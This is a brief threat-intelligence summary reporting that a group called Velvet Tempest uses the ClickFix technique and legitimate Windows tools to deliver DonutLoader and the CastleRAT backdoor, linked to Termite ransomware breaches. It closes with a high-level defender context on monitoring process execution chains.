Termite ransomware breaches linked to ClickFix CastleRAT attacks
Summary
A threat group known as Velvet Tempest is employing a technique called ClickFix, along with legitimate Windows tools, to distribute the DonutLoader malware and the CastleRAT backdoor. This sophisticated approach allows them to maintain persistence and execute further malicious activities.
IFF Assessment
FOE
This is bad news for defenders as it highlights an evolving attack method by a persistent threat actor that leverages legitimate tools to bypass defenses and deploy advanced malware.
Defender Context
Defenders should be aware of the ClickFix technique and the potential use of legitimate Windows utilities by threat actors to deploy malware. Monitoring for unusual process execution chains and the presence of DonutLoader and CastleRAT can help detect and prevent these attacks.